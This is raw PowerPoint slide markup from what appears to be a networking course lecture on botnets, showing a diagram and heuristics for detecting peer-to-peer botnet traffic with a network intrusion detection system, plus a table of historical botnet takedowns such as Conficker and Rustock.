          <p:nvSpPr>
            <p:cNvPr id="77" name="Rectangle: Rounded Corners 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E119D37-D620-41AC-B0E7-EB5491840D73}"/>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53F0EF3E-E5D5-47A7-B8F0-4AAB69871267}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6389102" y="1411965"/>
              <a:ext cx="1875636"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rPr>
                <a:t>Bulletproof Hosting</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60050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5D97FA9-5CDF-480D-BA5A-C09648D1C808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045882" y="2843772"/>
            <a:ext cx="4613836" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150"/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{511A3F2E-865B-442C-A780-A9932091B540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection of P2P</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Cloud 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A264E56A-E1E3-469C-9E83-E175DE1284F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4767312" y="2180990"/>
            <a:ext cx="1936743" cy="132556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Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F180E1DE-52C3-42B4-98C1-38F74C746569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503206" y="4860586"/>
            <a:ext cx="10990730" cy="17719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Many connections to seemingly random hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bursty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> traffic patterns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected geographic patterns (connections to hosts in other countries)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Connector: Elbow 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B665D411-4E78-45F7-9C2B-901FF99DED67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="0"/>
            <a:endCxn id="31" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6702441" y="1499496"/>
            <a:ext cx="3226697" cy="1344276"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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1F7E3B88-289E-4438-9E68-29AF9FD3ABFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="10" idx="0"/>
            <a:endCxn id="40" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6702441" y="2843772"/>
            <a:ext cx="3226697" cy="1545047"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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AF3BA67-4BC5-47AE-BB66-DA3A30A3B5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6702441" y="2843772"/>
            <a:ext cx="3763094" cy="0"/>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39" name="Connector: Curved 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92B630EA-0265-4708-BB25-4FABE99F97FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1243106" y="2821485"/>
            <a:ext cx="8510494" cy="1567334"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 82163"/>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41" name="Connector: Curved 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F0D7F3F-5B44-4284-8320-0E830929056F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1243007" y="2825590"/>
            <a:ext cx="8560186" cy="6397"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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44" name="Connector: Curved 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1672B8F4-63D9-4E47-A5E9-FA02A9EF891D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1243007" y="1490695"/>
            <a:ext cx="8510593" cy="1330300"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 80477"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="76200">
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{308E9B4B-03AA-42B2-BD19-098D3DFB751F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9929138" y="1027728"/>
            <a:ext cx="895755" cy="718715"/>
            <a:chOff x="10673976" y="3951992"/>
            <a:chExt cx="1340841" cy="1075833"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Picture 2" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D509CB26-2C37-4F72-AB82-E4EA84EA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8984" y="3951992"/>
              <a:ext cx="1075833" cy="107583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7CD86692-FF5F-43A0-AD4D-AE5040638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3976" y="4350974"/>
              <a:ext cx="614399" cy="614399"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0A420F1-287B-4DF0-AC67-A9CB42DEC38D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9929138" y="2442236"/>
            <a:ext cx="895755" cy="718715"/>
            <a:chOff x="10673976" y="3951992"/>
            <a:chExt cx="1340841" cy="1075833"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 2" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EACC9B4-ECE9-48F3-BC35-31E387B6D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8984" y="3951992"/>
              <a:ext cx="1075833" cy="107583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42BA5B0F-EDB3-466C-B919-71133780C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3976" y="4350974"/>
              <a:ext cx="614399" cy="614399"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="Group 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AAD8389-E056-4A0A-BAF8-7BFC5825A61F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9929138" y="3917051"/>
            <a:ext cx="895755" cy="718715"/>
            <a:chOff x="10673976" y="3951992"/>
            <a:chExt cx="1340841" cy="1075833"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="38" name="Picture 2" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADAB22A0-CB26-4EA3-9FFE-1547C298B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8984" y="3951992"/>
              <a:ext cx="1075833" cy="107583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6C2D223B-3983-48BD-8F51-F1FF7F4B6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3976" y="4350974"/>
              <a:ext cx="614399" cy="614399"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F84D0ACC-1293-4B31-98D3-C20B54DDDA45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2851785" y="1746443"/>
            <a:ext cx="1396127" cy="1732994"/>
            <a:chOff x="5775638" y="3240561"/>
            <a:chExt cx="1396127" cy="1732994"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D715D0F0-849C-4ED0-BB56-8B7FF83A5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3226" y="3702226"/>
              <a:ext cx="1328539" cy="1271329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A1AD27D-943E-42EC-B1BA-182BF2A1D02B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5775638" y="3240561"/>
              <a:ext cx="1396127" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>NIDS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B8493EA-461E-40CB-A13D-75107C51AD71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="150244" y="2336554"/>
            <a:ext cx="1340841" cy="1075833"/>
            <a:chOff x="10673976" y="3951992"/>
            <a:chExt cx="1340841" cy="1075833"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 2" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A090FBDC-F522-4CAC-8610-04DB39438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8984" y="3951992"/>
              <a:ext cx="1075833" cy="10758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6FBCE55-66FB-463E-9F51-4BEF48624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3976" y="4350974"/>
              <a:ext cx="614399" cy="614399"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316165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8EDC0-E46B-4F6A-BD89-C355A6BE2D2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Infamous Takedowns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97EBE839-0B4C-4CDD-B172-3AFE1045766A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3535789630"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="594354" y="1945640"/>
          <a:ext cx="11003292" cy="4251960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2948051">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1153862032"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1343635">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2404135747"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1595184">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="267045883"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5116422">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1380401494"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Botnet Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Timeframe</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Estimated Size</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Taken Down by…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3482695144"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>DNS Changer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2006-2011</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>4M</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FBI, Trend Micro</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2680550022"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Rustock</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2006-2011</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>150K-2.4M</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FBI, Microsoft, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Fireeye</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>, Univ. of Washington</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1142329885"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Grum</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2008-2012</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>560K-840K</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Fireeye</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Spamhaus</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="282660390"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Conficker</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2008-2009</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>4M-13M</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FBI, Microsoft, Symantec, ICANN</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3103813013"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Citadel</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2011-2013</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>FBI, Microsoft</a:t>
